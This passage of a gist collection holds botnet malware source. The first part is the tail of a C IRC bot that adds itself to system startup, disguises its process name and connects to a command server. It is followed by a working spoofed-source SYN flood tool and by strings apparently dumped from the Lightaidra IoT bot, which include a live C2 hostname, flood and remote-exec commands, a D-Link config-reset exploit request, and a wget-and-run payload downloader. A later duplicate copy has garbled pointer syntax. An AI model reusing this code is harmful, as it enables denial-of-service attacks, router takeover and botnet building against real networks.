        if (!strcasecmp(sender,nick)) {
                if (*str == ':') str++;
                if (nick) free(nick);
                nick=strdup(str);
        }
}
struct Messages { char *cmd; void (* func)(int,char *,char *); } msgs[] = {
        { "352", _352 },
        { "376", _376 },
        { "433", _433 },
        { "422", _376 },
        { "PRIVMSG", _PRIVMSG },
        { "PING", _PING },
        { "NICK", _NICK },
{ (char *)0, (void (*)(int,char *,char *))0 } };
void con() {
        struct sockaddr_in srv;
        unsigned long ipaddr,start;
        int flag;
        struct hostent *hp;
start:
        sock=-1;
        flag=1;
        if (changeservers == 0) server=servers[rand()%numservers];
        changeservers=0;
        while ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0);
        if (inet_addr(server) == 0 || inet_addr(server) == -1) {
                if ((hp = gethostbyname(server)) == NULL) {
                        server=NULL;
                        close(sock);
                        goto start;
                }
                bcopy((char*)hp->h_addr, (char*)&srv.sin_addr, hp->h_length);
        }
        else srv.sin_addr.s_addr=inet_addr(server);
        srv.sin_family = AF_INET;
        srv.sin_port = htons(5050);
        ioctl(sock,FIONBIO,&flag);
        start=time(NULL);
        while(time(NULL)-start < 10) {
                errno=0;
                if (connect(sock, (struct sockaddr *)&srv, sizeof(srv)) == 0 || errno == EISCONN) {
                        setsockopt(sock,SOL_SOCKET,SO_LINGER,0,0);
                        setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,0,0);
                        setsockopt(sock,SOL_SOCKET,SO_KEEPALIVE,0,0);
                        return;
                }
                if (!(errno == EINPROGRESS ||errno == EALREADY)) break;
                sleep(1);
        }
        server=NULL;
        close(sock);
        goto start;
}
int main(int argc, char **argv) {
        int on,i;
        char cwd[256],*str;
        FILE *file;
#ifdef STARTUP
        str="/etc/rc.d/rc.local";
        file=fopen(str,"r");
        if (file == NULL) {
                str="/etc/rc.conf";
                file=fopen(str,"r");
        }
        if (file != NULL) {
                char outfile[256], buf[1024];
                int i=strlen(argv[0]), d=0;
                getcwd(cwd,256);
                if (strcmp(cwd,"/")) {
                        while(argv[0][i] != '/') i--;
                        sprintf(outfile,"\"%s%s\"\n",cwd,argv[0]+i);
                        while(!feof(file)) {
                                fgets(buf,1024,file);
                                if (!strcasecmp(buf,outfile)) d++;
                        }
                        if (d == 0) {
                                FILE *out;
                                fclose(file);
                                out=fopen(str,"a");
                                if (out != NULL) {
                                        fputs(outfile,out);
                                        fclose(out);
                                }
                        }
                        else fclose(file);
                }
                else fclose(file);
        }
#endif
        if (fork()) exit(0);
#ifdef FAKENAME
        strncpy(argv[0],FAKENAME,strlen(argv[0]));
        for (on=1;on<argc;on++) memset(argv[on],0,strlen(argv[on]));
#endif
        srand((time(NULL) ^ getpid()) + getppid());
        nick=makestring();
        ident=makestring();
        user=makestring();
        chan=CHAN;
        key=KEY;
        server=NULL;
sa:
#ifdef IDENT
        for (i=0;i<numpids;i++) {
                if (pids[i] != 0 && pids[i] != getpid()) {
                        kill(pids[i],9);
                        waitpid(pids[i],NULL,WNOHANG);
                }
        }
        pids=NULL;
        numpids=0;
        identd();
#endif
        con();
        Send(sock,"NICK %s\nUSER %s localhost localhost :%s\n",nick,ident,user);
        while(1) {
                unsigned long i;
                fd_set n;
                struct timeval tv;
                FD_ZERO(&n);
                FD_SET(sock,&n);
                tv.tv_sec=60*20;
                tv.tv_usec=0;
                if (select(sock+1,&n,(fd_set*)0,(fd_set*)0,&tv) <= 0) goto sa;
                for (i=0;i<numpids;i++) if (waitpid(pids[i],NULL,WNOHANG) > 0) {
                        unsigned int *newpids,on;
                        for (on=i+1;on<numpids;on++) pids[on-1]=pids[on];
                        pids[on-1]=0;
                        numpids--;
                        newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));
                        for (on=0;on<numpids;on++) newpids[on]=pids[on];
                        free(pids);
                        pids=newpids;
                }
                if (FD_ISSET(sock,&n)) {
                        char buf[4096], *str;
                        int i;
                        if ((i=recv(sock,buf,4096,0)) <= 0) goto sa;
                        buf[i]=0;
                        str=strtok(buf,"\n");
                        while(str && *str) {
                                char name[1024], sender[1024];
                                filter(str);
                                if (*str == ':') {
                                        for (i=0;i<strlen(str) && str[i] != ' ';i++);
                                        str[i]=0;
                                        strcpy(sender,str+1);
                                        strcpy(str,str+i+1);
                                }
                                else strcpy(sender,"*");
                                for (i=0;i<strlen(str) && str[i] != ' ';i++);
                                str[i]=0;
                                strcpy(name,str);
                                strcpy(str,str+i+1);
                                for (i=0;msgs[i].cmd != (char *)0;i++) if (!strcasecmp(msgs[i].cmd,name)) msgs[i].func(sock,sender,str);
                                if (!strcasecmp(name,"ERROR")) goto sa;
                                str=strtok((char*)NULL,"\n");
                        }
                }
        }
        return 0;
}

## gistfile2.txt
/*
    Spoofed SYN by eKKiM
    Educational purpose only please.
    Compile with
    gcc syn.c -pthread
*/
#include <stdio.h>
#include <stdlib.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <pthread.h>
#include <errno.h>

#define THREADS 5


typedef struct pthread_param
{
    int argc;
    char **argv;
};

typedef struct pseudo_header
{
    unsigned int source_address;
    unsigned int dest_address;
    unsigned char placeholder;
    unsigned char protocol;
    unsigned short tcp_length;
    struct tcphdr tcp;
};

/* Thanks for unknown author, this saves me some time */
unsigned short csum(unsigned short *ptr,int nbytes) {
    register long sum;
    unsigned short oddbyte;
    register short answer;

    sum=0;
    while(nbytes>1) {
        sum+=*ptr++;
        nbytes-=2;
    }
    if(nbytes==1) {
        oddbyte=0;
        *((u_char*)&oddbyte)=*(u_char*)ptr;
        sum+=oddbyte;
    }

    sum = (sum>>16)+(sum & 0xffff);
    sum = sum + (sum>>16);
    answer=(short)~sum;

    return(answer);
}

int attack(int argc, char *argv[])
{
    int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP);
    char packet[4096];
    struct iphdr *iph = (struct iphdr *) packet;
    struct tcphdr *tcph = (struct tcphdr *) (packet + sizeof (struct ip));
    struct sockaddr_in sin;
    struct pseudo_header psh;
    char ip[16];

    sin.sin_family = AF_INET;
    sin.sin_port = htons(atoi(argv[2]));
    sin.sin_addr.s_addr = inet_addr (argv[1]);

    sprintf(ip, "%d.%d.%d.%d\n", rand() % 223, rand() % 255, rand() % 255, rand() % 255);

    memset (packet, 0, 4096);

    iph->ihl = 5;
    iph->version = 4;
    iph->tos = 0;
    iph->tot_len = sizeof (struct ip) + sizeof (struct tcphdr);
    iph->id = htonl (54321);
    iph->frag_off = 0;
    iph->ttl = 255;
    iph->protocol = IPPROTO_TCP;
    iph->check = 0;
    iph->saddr = inet_addr(ip);
    iph->daddr = sin.sin_addr.s_addr;

    iph->check = csum ((unsigned short *) packet, iph->tot_len >> 1);

    tcph->source = htons (1234);
    tcph->dest = htons (80);
    tcph->seq = 0;
    tcph->ack_seq = 0;
    tcph->doff = 5;
    tcph->fin=0;
    tcph->syn=1;
    tcph->rst=0;
    tcph->psh=0;
    tcph->ack=0;
    tcph->urg=0;
    tcph->window = htons (5840);
    tcph->check = 0;/* We fill this in later */
    tcph->urg_ptr = 0;

    psh.source_address = inet_addr(ip);
    psh.dest_address = sin.sin_addr.s_addr;
    psh.placeholder = 0;
    psh.protocol = IPPROTO_TCP;
    psh.tcp_length = htons(20);

    memcpy(&psh.tcp , tcph , sizeof (struct tcphdr));

    tcph->check = csum( (unsigned short*) &psh , sizeof (struct pseudo_header));

    //IP_HDRINCL needed for own headers
    int one = 1;
    const int *val = &one;
    int sockop = setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one));
    if (sockop < 0)
    {
        perror ("[x] Error msg: ");
        printf ("[x] Cannot set socket options: %i (are we r00t?)\n", errno);
        // exit(-1);
    }

    if (sendto (s, packet, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof (sin)) < 0)
        printf ("[x] Error sending packet\n");

    close(s);
    return 0;
}

void *thread_attack(void *thread_params)
{
    struct pthread_param *params = thread_params;

    while (1)
        attack(params->argc, params->argv);
}

int main (int argc, char *argv[])
{
    int i;
    printf("Spoofed SYN Attack\n");
    printf("          by eKKiM\n");
    printf("          for Orgy\n\n");

    srand(time(0));

    if (argc != 4)
    {
        printf("Usage: %s <destip> <destport> <time in seconds>\n", argv[0]);
        return -1;
    }

    pthread_t ssyn_attack[THREADS];

    struct pthread_param params;
    params.argc = argc;
    params.argv = argv;

    for (i = 0; i < THREADS; i++)
        pthread_create( &ssyn_attack[i], NULL, thread_attack, (void*) &params);


    printf("[*] Attacking..\n");
    sleep(atoi(argv[3]));

    return 0;

}

## gistfile3.txt
/var/run/.lightpid
%d.%d.%d.%d
@gibsonhacks
%s%s
72.233.89.197
%d.%d.%*s.%*s
light.crabdance.com:5050
PRIVMSG %s :[error] one error in your input data, see help!
PRIVMSG %s :[login] you are logged in, (%s).
PRIVMSG %s :[!login] sorry, wrong authenthication password!
GET /n09230945.asp HTTP/1.0
Host: automation.whatismyip.com
TOPIC %s
##r00tz
->%s
PASS
%s %s
NICK %s
USER pwn localhost localhost :Lightaidra ;)
Aidra?!
PART %s :%s
JOIN %s :%s
PING 0313370
penis123
PRIVMSG %s :*
PRIVMSG %s :* *** EOF
:.synflood
:.ngsynflood
:.ackflood
:.ngackflood
operation
QUOTE ZOMBIE
QUIT :pwn!
:.advscan->random
:.advscan->random->b
:.advscan->recursive
%*s%*s%*s%*s%255[^
(NULL)
PRIVMSG %s :%s
PING
PRIVMSG
:.login
:.logout
:.exec
:.version
:.status
:.help
:.spoof
:.advscan
:.stop
:.synflood->
:.ngsynflood->
:.ackflood->
:.ngackflood->
:.setchan
:.join
:.part
:.quit
PRIVMSG %s :[status] currently not working.
PRIVMSG %s :[status] working on %s
PRIVMSG %s :[version] lightaidra 0x2012.
PRIVMSG %s :[logout] you are logged out!, (%s).
PRIVMSG %s :* *** Access Commands:
PRIVMSG %s :* .login                <password>        - login to bot's party-line
PRIVMSG %s :* .logout                                 - logout from bot's party-line
PRIVMSG %s :* *** Miscs Commands
PRIVMSG %s :* .exec                 <commands>        - execute a system command
PRIVMSG %s :* .version                                - show the current version of bot
PRIVMSG %s :* .status                                 - show the status of bot
PRIVMSG %s :* .help                                   - show this help message
PRIVMSG %s :* *** Scan Commands
PRIVMSG %s :* .advscan <a> <b>      <user> <passwd>   - scan with user:pass (A.B) classes sets by you
PRIVMSG %s :* .advscan <a> <b>                        - scan with d-link config reset bug
PRIVMSG %s :* .advscan->recursive   <user> <pass>     - scan local ip range with user:pass, (C.D) classes random
PRIVMSG %s :* .advscan->recursive                     - scan local ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random      <user> <pass>     - scan random ip range with user:pass, (A.B) classes random
PRIVMSG %s :* .advscan->random                        - scan random ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random->b   <user> <pass>     - scan local ip range with user:pass, A.(B) class random
PRIVMSG %s :* .advscan->random->b                     - scan local ip range with d-link config reset bug
PRIVMSG %s :* .stop                                   - stop current operation (scan/dos)
PRIVMSG %s :* *** DDos Commands:
PRIVMSG %s :* NOTE: <port> to 0 = random ports, <ip> to 0 = random spoofing,
PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs
PRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86
PRIVMSG %s :* .spoof          <ip>                    - set the source address ip spoof
PRIVMSG %s :* .synflood       <host> <port> <secs>    - tcp syn flooder
PRIVMSG %s :* .ngsynflood     <host> <port> <secs>    - tcp ngsyn flooder (new generation)
PRIVMSG %s :* .ackflood       <host> <port> <secs>    - tcp ack flooder
PRIVMSG %s :* .ngackflood     <host> <port> <secs>    - tcp ngack flooder (new generation)
PRIVMSG %s :* *** IRC Commands:
PRIVMSG %s :* .setchan        <channel>               - set new master channel
PRIVMSG %s :* .join           <channel> <password>    - join bot in selected room
PRIVMSG %s :* .part           <channel>               - part bot from selected room
PRIVMSG %s :* .quit                                   - kill the current process
synflood packeting %s:%u (secs: %u)
PRIVMSG %s :[synflood] start packeting: %s:%u (secs: %u).
ngsynflood packeting %s:%u (secs: %u)
PRIVMSG %s :[ngsynflood] start packeting: %s:%u (secs: %u).
ackflood packeting %s:%u (secs: %u)
PRIVMSG %s :[ackflood] start packeting: %s:%u (secs: %u).
ngackflood packeting %s:%u (secs: %u)
PRIVMSG %s :[ngackflood] start packeting: %s:%u (secs: %u).
PRIVMSG %s :[stop] %s was stopped!
PRIVMSG %s :[chan] %s setted as master channel.
PRIVMSG %s :[spoof] spoofing set as random ip!
PRIVMSG %s :[spoof] spoofing set as ip: %s
advscan scanning range %s.%s.0.0/16 (user:%s pass:%s)
advscan scanning range %s.%s.0.0/16
PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16 (user:%s pass:%s). wait..
PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16. wait..
PRIVMSG %s :[error] unable to get local ip, switching to random scan..
PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16 (user:%s pass:%s), wait..
PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16, wait..
PRIVMSG %s :[!exec] error on command: %s
PRIVMSG %s :[exec] result of "%s":
%127s%31s%31s%31s%31s%31s%31s%31s
PRIVMSG %s :[block] already working on %s
POST /cgi-bin/firmwarecfg HTTP/1.1
Host: $IP
User-Agent: veryprivateacsor
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Content-Type: multipart/form-data;
boundary=---------------------------41184676334
Content-Length: 234
-----------------------------41184676334
Content-Disposition: form-data; name="config.x"
-----------------------------41184676334
Content-Disposition: form-data; name="config.y"
-----------------------------41184676334--
http://184.106.181.149/html/aidra
rm -rf /var/run/getbinaries.sh; wget -c %s/getbinaries.sh -P /var/run && sh /var/run/getbinaries.sh&
PRIVMSG %s :[error] unable to open: %s
PRIVMSG %s :[crash] scanner has crashed, continuing to pwning..
PRIVMSG %s :[advscan] scanner completed, founds %d ips..
PRIVMSG %s :[advscan] scanner completed, founds %d ips, pwning time..
PRIVMSG %s :[vuln] address: %s (user:%s pass:%s) possible vuln with default password!
PRIVMSG %s :[vuln] address: %s (user:root pass:%s) possible vuln with config file post request!
password>
password
root
/var/run/.lightscan
%s.%s.%d.%d
%16s
PRIVMSG %s :[ngackflood] packeting completed!
PRIVMSG %s :[ackflood] packeting completed!
PRIVMSG %s :[ngsynflood] packeting completed!
PRIVMSG %s :[nsynflood] packeting completed!
	/*
	Spoofed SYN by eKKiM
	Educational purpose only please.
	Compile with
	gcc syn.c -pthread
	*/
	#include <stdio.h>
	#include <stdlib.h>
	#include <netinet/tcp.h>
	#include <netinet/ip.h>
	#include <pthread.h>
	#include <errno.h>

	#define THREADS 5


	typedef struct pthread_param
	{
	int argc;
	char **argv;
	};

	typedef struct pseudo_header
	{
	unsigned int source_address;
	unsigned int dest_address;
	unsigned char placeholder;
	unsigned char protocol;
	unsigned short tcp_length;
	struct tcphdr tcp;
	};

	/* Thanks for unknown author, this saves me some time */
	unsigned short csum(unsigned short *ptr,int nbytes) {
	register long sum;
	unsigned short oddbyte;
	register short answer;

	sum=0;
	while(nbytes>1) {
	sum+=*ptr++;
	nbytes-=2;
	}
	if(nbytes==1) {
	oddbyte=0;
	((u_char)&oddbyte)=(u_char)ptr;
	sum+=oddbyte;
	}

	sum = (sum>>16)+(sum & 0xffff);
	sum = sum + (sum>>16);
	answer=(short)~sum;

	return(answer);
	}

	int attack(int argc, char *argv[])
	{
	int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP);
	char packet[4096];
	struct iphdr iph = (struct iphdr ) packet;
	struct tcphdr tcph = (struct tcphdr ) (packet + sizeof (struct ip));
	struct sockaddr_in sin;
	struct pseudo_header psh;
	char ip[16];

	sin.sin_family = AF_INET;
	sin.sin_port = htons(atoi(argv[2]));
	sin.sin_addr.s_addr = inet_addr (argv[1]);

	sprintf(ip, "%d.%d.%d.%d\n", rand() % 223, rand() % 255, rand() % 255, rand() % 255);

	memset (packet, 0, 4096);

	iph->ihl = 5;
	iph->version = 4;
	iph->tos = 0;
	iph->tot_len = sizeof (struct ip) + sizeof (struct tcphdr);
	iph->id = htonl (54321);
	iph->frag_off = 0;
	iph->ttl = 255;
	iph->protocol = IPPROTO_TCP;
	iph->check = 0;
	iph->saddr = inet_addr(ip);
	iph->daddr = sin.sin_addr.s_addr;

	iph->check = csum ((unsigned short *) packet, iph->tot_len >> 1);

	tcph->source = htons (1234);
	tcph->dest = htons (80);
	tcph->seq = 0;
	tcph->ack_seq = 0;
	tcph->doff = 5;
	tcph->fin=0;
	tcph->syn=1;
	tcph->rst=0;
	tcph->psh=0;
	tcph->ack=0;
	tcph->urg=0;
	tcph->window = htons (5840);
	tcph->check = 0;/* We fill this in later */
	tcph->urg_ptr = 0;

	psh.source_address = inet_addr(ip);
	psh.dest_address = sin.sin_addr.s_addr;
	psh.placeholder = 0;
	psh.protocol = IPPROTO_TCP;
	psh.tcp_length = htons(20);

	memcpy(&psh.tcp , tcph , sizeof (struct tcphdr));

	tcph->check = csum( (unsigned short*) &psh , sizeof (struct pseudo_header));

	//IP_HDRINCL needed for own headers
	int one = 1;
	const int *val = &one;
	int sockop = setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one));
	if (sockop < 0)
	{
	perror ("[x] Error msg: ");
	printf ("[x] Cannot set socket options: %i (are we r00t?)\n", errno);
	// exit(-1);
	}

	if (sendto (s, packet, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof (sin)) < 0)
	printf ("[x] Error sending packet\n");

	close(s);
	return 0;
	}

	void thread_attack(void thread_params)
	{
	struct pthread_param *params = thread_params;

	while (1)
	attack(params->argc, params->argv);
	}

	int main (int argc, char *argv[])
	{
	int i;
	printf("Spoofed SYN Attack\n");
	printf(" by eKKiM\n");
	printf(" for Orgy\n\n");

	srand(time(0));

	if (argc != 4)
	{
	printf("Usage: %s <destip> <destport> <time in seconds>\n", argv[0]);
	return -1;
	}

	pthread_t ssyn_attack[THREADS];

	struct pthread_param params;
	params.argc = argc;
	params.argv = argv;

	for (i = 0; i < THREADS; i++)
	pthread_create( &ssyn_attack[i], NULL, thread_attack, (void*) &params);


	printf("[*] Attacking..\n");
	sleep(atoi(argv[3]));

	return 0;

	}
	/var/run/.lightpid
	%d.%d.%d.%d
	@gibsonhacks
	%s%s
	72.233.89.197
	%d.%d.%s.%s
	light.crabdance.com:5050
	PRIVMSG %s :[error] one error in your input data, see help!
	PRIVMSG %s :[login] you are logged in, (%s).
	PRIVMSG %s :[!login] sorry, wrong authenthication password!
	GET /n09230945.asp HTTP/1.0
	Host: automation.whatismyip.com
	TOPIC %s
	##r00tz
	->%s
	PASS
	%s %s
	NICK %s
	USER pwn localhost localhost :Lightaidra ;)
	Aidra?!
	PART %s :%s
	JOIN %s :%s
	PING 0313370
	penis123
	PRIVMSG %s :*
	PRIVMSG %s :* *** EOF
	:.synflood
	:.ngsynflood
	:.ackflood
	:.ngackflood
	operation
	QUOTE ZOMBIE
	QUIT :pwn!
	:.advscan->random
	:.advscan->random->b
	:.advscan->recursive
	%s%s%s%s%255[^
	(NULL)
	PRIVMSG %s :%s
	PING
	PRIVMSG
	:.login
	:.logout
	:.exec
	:.version
	:.status
	:.help
	:.spoof
	:.advscan
	:.stop
	:.synflood->
	:.ngsynflood->
	:.ackflood->
	:.ngackflood->
	:.setchan
	:.join
	:.part
	:.quit
	PRIVMSG %s :[status] currently not working.
	PRIVMSG %s :[status] working on %s
	PRIVMSG %s :[version] lightaidra 0x2012.
	PRIVMSG %s :[logout] you are logged out!, (%s).
	PRIVMSG %s :* *** Access Commands:
	PRIVMSG %s :* .login <password> - login to bot's party-line
	PRIVMSG %s :* .logout - logout from bot's party-line
	PRIVMSG %s :* *** Miscs Commands
	PRIVMSG %s :* .exec <commands> - execute a system command
	PRIVMSG %s :* .version - show the current version of bot
	PRIVMSG %s :* .status - show the status of bot
	PRIVMSG %s :* .help - show this help message
	PRIVMSG %s :* *** Scan Commands
	PRIVMSG %s :* .advscan <a> <b> <user> <passwd> - scan with user:pass (A.B) classes sets by you
	PRIVMSG %s :* .advscan <a> <b> - scan with d-link config reset bug
	PRIVMSG %s :* .advscan->recursive <user> <pass> - scan local ip range with user:pass, (C.D) classes random
	PRIVMSG %s :* .advscan->recursive - scan local ip range with d-link config reset bug
	PRIVMSG %s :* .advscan->random <user> <pass> - scan random ip range with user:pass, (A.B) classes random
	PRIVMSG %s :* .advscan->random - scan random ip range with d-link config reset bug
	PRIVMSG %s :* .advscan->random->b <user> <pass> - scan local ip range with user:pass, A.(B) class random
	PRIVMSG %s :* .advscan->random->b - scan local ip range with d-link config reset bug
	PRIVMSG %s :* .stop - stop current operation (scan/dos)
	PRIVMSG %s :* *** DDos Commands:
	PRIVMSG %s :* NOTE: <port> to 0 = random ports, <ip> to 0 = random spoofing,
	PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs
	PRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86
	PRIVMSG %s :* .spoof <ip> - set the source address ip spoof
	PRIVMSG %s :* .synflood <host> <port> <secs> - tcp syn flooder
	PRIVMSG %s :* .ngsynflood <host> <port> <secs> - tcp ngsyn flooder (new generation)
	PRIVMSG %s :* .ackflood <host> <port> <secs> - tcp ack flooder
	PRIVMSG %s :* .ngackflood <host> <port> <secs> - tcp ngack flooder (new generation)
	PRIVMSG %s :* *** IRC Commands:
	PRIVMSG %s :* .setchan <channel> - set new master channel
	PRIVMSG %s :* .join <channel> <password> - join bot in selected room
	PRIVMSG %s :* .part <channel> - part bot from selected room
	PRIVMSG %s :* .quit - kill the current process
	synflood packeting %s:%u (secs: %u)
	PRIVMSG %s :[synflood] start packeting: %s:%u (secs: %u).
	ngsynflood packeting %s:%u (secs: %u)
	PRIVMSG %s :[ngsynflood] start packeting: %s:%u (secs: %u).
	ackflood packeting %s:%u (secs: %u)
	PRIVMSG %s :[ackflood] start packeting: %s:%u (secs: %u).
	ngackflood packeting %s:%u (secs: %u)
	PRIVMSG %s :[ngackflood] start packeting: %s:%u (secs: %u).
	PRIVMSG %s :[stop] %s was stopped!
	PRIVMSG %s :[chan] %s setted as master channel.
	PRIVMSG %s :[spoof] spoofing set as random ip!
	PRIVMSG %s :[spoof] spoofing set as ip: %s
	advscan scanning range %s.%s.0.0/16 (user:%s pass:%s)
	advscan scanning range %s.%s.0.0/16
	PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16 (user:%s pass:%s). wait..
	PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16. wait..
	PRIVMSG %s :[error] unable to get local ip, switching to random scan..
	PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16 (user:%s pass:%s), wait..
	PRIVMSG %s :[advscan] scanning range: %s.%s.0.0/16, wait..
	PRIVMSG %s :[!exec] error on command: %s
	PRIVMSG %s :[exec] result of "%s":
	%127s%31s%31s%31s%31s%31s%31s%31s
	PRIVMSG %s :[block] already working on %s
	POST /cgi-bin/firmwarecfg HTTP/1.1
	Host: $IP
	User-Agent: veryprivateacsor
	Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,/;q=0.5
	Accept-Language: en-us,en;q=0.5
	Accept-Encoding: gzip,deflate
	Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
	Keep-Alive: 300
	Connection: keep-alive
	Content-Type: multipart/form-data;
	boundary=---------------------------41184676334
	Content-Length: 234
	-----------------------------41184676334
	Content-Disposition: form-data; name="config.x"
	-----------------------------41184676334
	Content-Disposition: form-data; name="config.y"
	-----------------------------41184676334--
	http://184.106.181.149/html/aidra
	rm -rf /var/run/getbinaries.sh; wget -c %s/getbinaries.sh -P /var/run && sh /var/run/getbinaries.sh&
	PRIVMSG %s :[error] unable to open: %s
	PRIVMSG %s :[crash] scanner has crashed, continuing to pwning..
	PRIVMSG %s :[advscan] scanner completed, founds %d ips..
	PRIVMSG %s :[advscan] scanner completed, founds %d ips, pwning time..
	PRIVMSG %s :[vuln] address: %s (user:%s pass:%s) possible vuln with default password!
	PRIVMSG %s :[vuln] address: %s (user:root pass:%s) possible vuln with config file post request!
	password>
	password
	root
	/var/run/.lightscan
	%s.%s.%d.%d
	%16s
	PRIVMSG %s :[ngackflood] packeting completed!
	PRIVMSG %s :[ackflood] packeting completed!
	PRIVMSG %s :[ngsynflood] packeting completed!
	PRIVMSG %s :[nsynflood] packeting completed!